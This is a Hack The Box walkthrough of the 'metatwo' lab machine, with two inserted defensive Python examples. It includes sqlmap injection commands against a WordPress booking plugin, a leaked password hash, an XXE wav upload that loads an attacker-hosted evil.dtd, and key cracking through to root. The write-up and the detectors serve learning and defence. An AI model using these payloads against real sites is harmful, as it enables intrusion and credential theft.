metatwo HTB walkthrough

Rishabh Rai
7 min read · Apr 25, 2023


Hello, today I am writing this walkthrough about how I solved this machine on HTB. I will try to include all the steps I went through, be they right turns or rabbit holes.

I want to write not only what you should do to solve the machine but also what mistakes I made in the process and how I overcame them, to give you a much better reading and learning experience. #letskeepitreal 😁🤓

Let’s get started with the machine. I fired it up and ran an nmap scan on the IP.

This is what I got after running nmap on the IP:

┌──(root㉿kali)-[~/HTB/metatwo]
└─# nmap 10.10.11.186 -p- --min-rate 1000 -sC -sV -oN metatwo_nmap
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-23 04:19 EDT
Nmap scan report for 10.10.11.186
Host is up (0.49s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp?
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 c4b44617d2102d8fec1dc927fecd79ee (RSA)
| 256 2aea2fcb23e8c529409cab866dcd4411 (ECDSA)
|_ 256 fd78c0b0e22016fa050debd83f12a4ab (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Did not follow redirect to http://metapress.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We can see HTTP, SSH and FTP ports open on the server.
The first thing I tried was anonymous login on the FTP server; even though from the nmap output you can see that no anonymous login is allowed, it wouldn’t hurt to try.

Reaching port 80 on the IP I found this, hence I added the DNS entry to the /etc/hosts file so that I can open up the web server and find something there.

After reaching the website, we should first try to find out what server or vendor it is hosted on, or what version of the service is running. To find that, I went to the bottom of the website, and I found out it is a WordPress site.

If you are new or you haven’t tried any pentesting involving WordPress, then I must tell you that WordPress is very insecure in nature, meaning it is very vulnerable.

Let’s enumerate more to find any problems.

I fired up sqlmap to check for any injection in the search option.

But it is not injectable, sad :(
No XSS either.

After finding nothing here I started Gobuster and searched for any interesting directories on the server, and boy, I hit the jackpot of directories here.

I also went ahead and ran wpscan on this as well to increase the chances of finding a vulnerability.

I also searched Google for any kind of vulnerability, and I stumbled upon this:

https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5

I got here and tried to look for something useful, but it was of no use.

After finding nothing, I went back to the web server and tried checking for any service running on WordPress. On the events page we can register and book a date for an appointment.

While going through the page I found the script name, and searched for an exploit related to it.

I found a promising looking exploit here:
https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357

A curl command is invoked, so let’s invoke that and see if the exploit works.
Don’t forget to change https to http and also change the nonce value, or it will show an auth error.

After a little trial and error I got it working.

We have found the SQLi successfully; now we will attack it using sqlmap to make our work easy.

I used this sqlmap command to make it brute-force any attack on the parameter total_service.

sqlmap -u 'http://metapress.htb/wp-admin/admin-ajax.php' --data 'action=bookingpress_front_get_category_services&_wpnonce=1b5f712f30&category_id=33&total_service=' -p total_service

But it did not work, and then I tried this:

sqlmap -u 'http://metapress.htb/wp-admin/admin-ajax.php' --data 'action=bookingpress_front_get_category_services&_wpnonce=1b5f712f30&category_id=33&total_service=-7865)' -p total_service --dbs

$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV. : admin

Finally got this!!!!
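The sqlmap commands above only work because the total_service value reaches the database without being checked as a number. As an added example (not part of the original walkthrough), the following Python shows the defender's view of the same request: an allowlist check that flags any bookingpress_front_get_category_services call whose total_service is not a plain integer, plus the server-side cast that would have prevented the injection. The request bodies are constructed here from the command in the walkthrough; a default nginx access log does not record POST bodies, so this check assumes the parameters come from a WAF, a body-logging proxy, or the application itself.

```python
"""Flag BookingPress-style admin-ajax requests whose total_service is not an integer.

Added example, not code from the walkthrough or the plugin. Assumes the
request body has already been captured (WAF, body-logging proxy, or the app).
"""
import re
from urllib.parse import parse_qs

# Constructed sample bodies modelled on the sqlmap command in the walkthrough.
SAMPLE_REQUESTS = [
    "action=bookingpress_front_get_category_services&_wpnonce=1b5f712f30&category_id=33&total_service=5",
    "action=bookingpress_front_get_category_services&_wpnonce=1b5f712f30&category_id=33&total_service=-7865)",
    "action=bookingpress_front_get_category_services&_wpnonce=1b5f712f30&category_id=33&total_service=1 AND 1=1",
    "action=heartbeat&_nonce=abc",  # unrelated WordPress AJAX action, must not be flagged
]

WATCHED_ACTION = "bookingpress_front_get_category_services"
INTEGER = re.compile(r"-?\d+")


def parse_body(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into a single-valued dict."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def is_suspicious(params: dict) -> bool:
    """True when the watched action carries a total_service that is not a plain integer.

    This is a strict allowlist: an empty value is also flagged, because the first
    sqlmap command in the walkthrough sends exactly that and injects into it.
    """
    if params.get("action") != WATCHED_ACTION:
        return False
    value = params.get("total_service", "")
    return INTEGER.fullmatch(value) is None


def scan(bodies) -> list:
    """Return the offending total_service values found in a batch of request bodies."""
    flagged = []
    for body in bodies:
        params = parse_body(body)
        if is_suspicious(params):
            flagged.append(params.get("total_service", ""))
    return flagged


def validate_total_service(value: str) -> int:
    """Server-side fix: coerce to int before the value ever reaches a query.

    int() raises ValueError for anything that is not an integer literal, so
    "-7865)" or "1 AND 1=1" never becomes part of SQL text.
    """
    return int(value)


if __name__ == "__main__":
    for hit in scan(SAMPLE_REQUESTS):
        print("suspicious total_service:", repr(hit))
```

The regular expression is deliberately narrow: the point is not to recognise SQL syntax but to reject everything that is not the one shape the parameter is supposed to have, which is the same rule the plugin should enforce before building its query.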

After solving I got this.

For manager I got the password as

I tried uploading this but it was not uploading, so I tried to look up an exploit. One tip: if you ever get WordPress access at any account level, look for any media upload, theme or plugin upload, or whether you can change the code of a page in the server’s file system. You might end up getting a reverse shell from there. Now moving forward.

We do have a media library, so let’s try this.
More green flags !!!!

I followed the page as it suggested, and I had to create a wav file which will call the evil.dtd file hosted on my PHP server.

Then an evil.dtd file that will run the command for me. After this I opened up a PHP server on my machine.

If you follow the site, you can get the /etc/passwd file and read its content. Now, to move forward, you can try to look at the wp-config file.

After trying the location /var/www/metapress.htb/wp-config.php I got nothing, then I tried

/var/www/metapress.htb/blog/wp-config.php and I got this result.

After starting the PHP server, go and upload the payload wav normally and you should have it.
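The upload above works because the media library parses metadata embedded in the wav file, and that metadata can carry a DOCTYPE with an external entity pointing at the evil.dtd. As an added example (not code from the walkthrough or from WordPress), the following Python walks the RIFF chunks of an uploaded wav and reports any chunk whose payload contains DTD or entity markup, which is the check an upload handler or a post-incident scan of the uploads directory would want. Both sample files, the benign one and the one carrying an external entity declaration, are constructed inline; the hostname in the constructed sample is a placeholder.

```python
"""Scan a RIFF/WAVE file for embedded DTD/entity markup (XXE indicator).

Added example, not from the walkthrough. The two sample files below are
constructed in this script; nothing is read from disk.
"""
import re
import struct

# XML keywords are case-sensitive, so a plain search is enough.
XXE_MARKERS = re.compile(rb"<!DOCTYPE|<!ENTITY")


def build_wav(extra_chunks):
    """Construct a minimal PCM WAVE file plus the given (chunk_id, payload) chunks."""
    fmt = struct.pack("<HHIIHH", 1, 1, 8000, 16000, 2, 16)  # PCM, mono, 8 kHz, 16-bit
    chunks = [(b"fmt ", fmt), (b"data", b"\x00\x00" * 4)] + list(extra_chunks)
    body = b"WAVE"
    for cid, payload in chunks:
        body += cid + struct.pack("<I", len(payload)) + payload
        if len(payload) % 2:  # RIFF chunks are word-aligned
            body += b"\x00"
    return b"RIFF" + struct.pack("<I", len(body)) + body


def iter_chunks(data: bytes):
    """Yield (chunk_id, payload) for each chunk; a truncated last chunk is yielded as-is."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        raise ValueError("not a RIFF/WAVE file")
    pos = 12
    while pos + 8 <= len(data):
        cid = data[pos:pos + 4]
        size = struct.unpack("<I", data[pos + 4:pos + 8])[0]
        yield cid, data[pos + 8:pos + 8 + size]
        pos += 8 + size + (size % 2)


def find_xxe_markers(data: bytes) -> list:
    """Return [(chunk_id, marker), ...] for chunks containing DTD/entity markup."""
    hits = []
    for cid, payload in iter_chunks(data):
        match = XXE_MARKERS.search(payload)
        if match:
            hits.append((cid.decode("ascii", "replace"), match.group(0).decode("ascii")))
    return hits


def is_safe_upload(data: bytes) -> bool:
    """Upload-handler decision: reject any wav whose metadata declares a DTD or entity."""
    return not find_xxe_markers(data)


# Constructed samples. iXML is a real metadata chunk type that carries XML text.
BENIGN_IXML = b'<?xml version="1.0"?><BWFXML><PROJECT>podcast</PROJECT></BWFXML>'
XXE_IXML = (b'<?xml version="1.0"?>'
            b'<!DOCTYPE r [<!ENTITY ext SYSTEM "http://placeholder.invalid/evil.dtd">]>'
            b'<r>&ext;</r>')
BENIGN_WAV = build_wav([(b"iXML", BENIGN_IXML)])
XXE_WAV = build_wav([(b"iXML", XXE_IXML)])

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_WAV), ("xxe", XXE_WAV)):
        print(name, "safe" if is_safe_upload(blob) else f"rejected: {find_xxe_markers(blob)}")
```

The scan runs over every chunk rather than only iXML, because the parser on the server side decides which chunks it reads as XML, not the filename or the chunk you expect; rejecting the file before it is handed to that parser is the mitigation, alongside disabling external entity resolution in the XML library itself.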

After getting the base64 data I did this to convert it to a normal readable format.

We can see the password here for the FTP user metapress.htb.

Let’s try to log in to the FTP server using this.

Successfully in the FTP server.

A thousand get commands later, I got this in the mailserver file on the FTP server.

Find the file on your own; this time I am not showing the directory, to let you try on your own.

We know from the nmap result that port 587 is not open, hence I have only one choice: log in to the SSH server and hope that my open sesame! works.

Finally !! we have something to celebrate !!!

Now after submitting the user flag

Firstly I checked sudo -l, but bad luck there, and then I transferred linpeas.sh to the box and ran it to look for any openings.

I found a netstat output interesting.

It is the MySQL server port though.

Then I saw this,

and then I looked for it in jnelson’s directory.

Note: gpg2john will only work on the private key, so take the second key in the .keys file and run the command as shown; you will get the password from there.

This was neither the password for root, nor did any passpie user exist, so I turned to Google for a solution.

Found this interesting:

the export creds part !!

Pretty simple command, let’s try something on the machine.

After a little trial and error we have the password to root the box.

We have successfully pwned another machine. It was a great experience and I learned a lot in this!!!

HAPPY HACKING !!! stay tuned for more boxes….


Written by Rishabh Rai

4th year student exploring the world of cyber security with a knack for writing and always learning.